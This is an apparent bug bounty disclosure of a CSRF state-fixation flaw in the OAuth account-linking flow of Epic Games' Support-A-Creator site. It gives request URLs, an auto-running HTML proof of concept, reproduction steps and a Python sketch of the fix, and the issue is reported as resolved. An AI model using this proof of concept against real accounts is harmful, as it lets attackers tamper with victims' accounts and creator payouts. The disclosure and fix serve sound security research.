Epic Games - Add your social media account to any epicgames account on https://sac.epicgames.com [CSRF Fixation]

Company Information :

Epic Games, Inc. is an American video game and software developer and publisher based in Cary, North Carolina. The company was founded by Tim Sweeney as Potomac Computer Systems in 1991, originally located in his parents' house in Potomac, Maryland.


Bug Category : 

CSRF Token Fixation : 

Devise contains a flaw that allows a remote, user-assisted attacker to conduct a CSRF token fixation attack. This issue is triggered as previous CSRF tokens are not properly invalidated when a new token is created. If an attacker has knowledge of said token, a specially crafted request can be made to it, allowing the attacker to conduct CSRF attacks.



Target  Information : 

https://sac.epicgames.com


Technical Details of the Bug : 

https://sac.epicgames.com is a platform where social media influencers can showcase their work through their social media accounts and earn money. To register on this platform you need a minimum of 1000 followers. The social media account linking flow is vulnerable to a CSRF attack that allows an attacker to add their social media account to any other Epic Games user's account. This attack works on the YouTube, Twitch and VK.com integrations.


Product Details :

https://sac.epicgames.com - The Support-A-Creator program :
The Support-A-Creator program is an affiliate marketing program for streamers and social media content creators. Support-A-Creator gives creators the opportunity to receive real-money payout awards by creating content for Fortnite, Rocket League, and participating games in the Epic Games Store. Epic believes that content creators are an essential part of building communities around awesome games. We recognize how important content creators of all kinds have been to our success, so we built this program to share in that success.

Vulnerable URL :

https://sac.epicgames.com/en-US/settings/socials

Vulnerable Flow :

1. CSRF Fixation :
https://sac.epicgames.com/api/get-oauth-link?platform=YOUTUBE_CHANNEL&authState=0.53be4wepkvg


This is the first request. It sends the authState value, which is fixed on the server side and checked again in the final request.
Response : It redirects you to the auth provider for access.
https://accounts.google.com/o/oauth2/v2/auth?client_id=534123337821-krehgr4m7v7k51tl2d1brnemtktd2v30.apps.googleusercontent.com&redirect_uri=https%3A%2F%2Fsac.epicgames.com%2Fauth_callback&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fyoutube.readonly&state=0.53be4wepkvg&include_granted_scopes=true&response_type=code&access_type=offline&prompt=consent


2. Final Request : Once you grant access to the Epic Games application at your OAuth provider, the request below is sent.

https://sac.epicgames.com/auth_callback?state=0.53be4wepkvg&code=4/0AVHEtk591HEMxNyW3Mie0h96mGQlq2Sm_DiHH1UljvSv5dlOOpi_kbZLK2tx8HFd9NHpGg&scope=https://www.googleapis.com/auth/youtube.readonly

As you can see, the state parameter is the same in all of these requests. So if you directly send the second (final) request on its own, the server rejects it with a state validation error.

State token validation Bypass :

You can put any value as authState, such as test or hack, and it works the same way. So if you send the first request with a custom state and then send the final request with the same custom state, the state validation is bypassed. Example: first send the request below:
https://sac.epicgames.com/api/get-oauth-link?platform=YOUTUBE_CHANNEL&authState=anything


and then send the final request below:
https://sac.epicgames.com/auth_callback?state=anything&code=[Code]&scope=https://www.googleapis.com/auth/youtube.readonly

Then you can add your social media account to any other user's account with the help of the following CSRF PoC.

CSRF POC (for YouTube integration) :

<!DOCTYPE html>
<html>
  <head>
    <title>Open links in new tabs and close them</title>
    <script>
      // Step 1: fix the attacker-chosen state ("anything") in the victim's session.
      function openLinkA() {
        window.open("https://sac.epicgames.com/api/get-oauth-link?platform=YOUTUBE_CHANNEL&authState=anything", "_blank");
        setTimeout(openLinkB, 5000);
        setTimeout(closeTabs, 10000);
      }

      // Step 2: replay the callback with the same state and the attacker's OAuth code.
      function openLinkB() {
        window.open("https://sac.epicgames.com/auth_callback?state=anything&code=[Code]&scope=https://www.googleapis.com/auth/youtube.readonly", "_blank");
        setTimeout(closeTabs, 5000);
      }

      function closeTabs() {
        window.close();
      }
    </script>
  </head>
  <body onload="openLinkA()">
    <p>This page will automatically open links in new tabs and close them after a few seconds.</p>
  </body>
</html>

Replace [Code] with your own OAuth code.
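The root cause of the flow above is that authState is chosen by the client and stored as-is, so a value like "anything" can be fixed into a victim's session and replayed. The following Python sketch is an added example (not Epic Games' code; the session dict and URLs are constructed) that contrasts that pattern with a handler that generates the state server-side, binds it to the session, compares it in constant time and consumes it once.

```python
import hmac
import secrets

# The "session" below is a constructed per-user server-side store,
# standing in for whatever backs the cookie session in the real flow.


def start_oauth_vulnerable(session: dict, client_state: str) -> str:
    """Models /api/get-oauth-link?authState=...: the server fixes whatever
    state the client supplied and later checks only that it matches."""
    session["oauth_state"] = client_state
    return f"https://provider.example/auth?state={client_state}"


def callback_vulnerable(session: dict, state: str) -> bool:
    """Models /auth_callback?state=...: any previously fixed value passes,
    so a state chosen by a third party (e.g. "anything") is accepted."""
    return session.get("oauth_state") == state


def start_oauth_fixed(session: dict) -> str:
    """Hardened variant: the state is generated server-side, unguessable,
    bound to this session and never taken from the request."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return f"https://provider.example/auth?state={state}"


def callback_fixed(session: dict, state: str) -> bool:
    """Single-use, constant-time check: the expected value is removed from
    the session on first use, so a replayed callback fails even with the
    correct state, and a callback with no pending flow is rejected."""
    expected = session.pop("oauth_state", None)
    if expected is None or not isinstance(state, str):
        return False
    return hmac.compare_digest(expected.encode(), state.encode())
```

Binding the state to the session only helps if the first request cannot be forced from a cross-site page, which is why the hardened start handler takes no client-supplied state at all.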

Steps To Reproduce:

In order to reproduce the issue you will need 2 working accounts on https://sac.epicgames.com. You can also test it during the registration process, as the flow is the same. I am taking the YouTube integration as an example.

1. Log in with test account A and go to social accounts. Link : https://sac.epicgames.com/en-US/settings/socials
2. Now connect your YouTube integration and intercept the request.
3. You will notice the first request. Now complete the process, but intercept the final request mentioned above.
4. Now drop this request and copy the OAuth code you got from YouTube.
5. Now place it into the HTML PoC mentioned above.
6. Now log in with test account B and go to social accounts.
7. Now run the above-mentioned PoC in another tab.
8. Now refresh the page and you will see that test A's YouTube account has been added to the test B user account.

You can reproduce this for Twitch and VK.com too.
Video POC :





Timeline : 



April 2nd 2023: Report sent to Epic Games Security Team through HackerOne.

April 10th 2023: Report Accepted and Triaged.

April 25th 2023: Issue completely resolved and confirmed.

April 18th 2023: $1500 bounty rewarded.
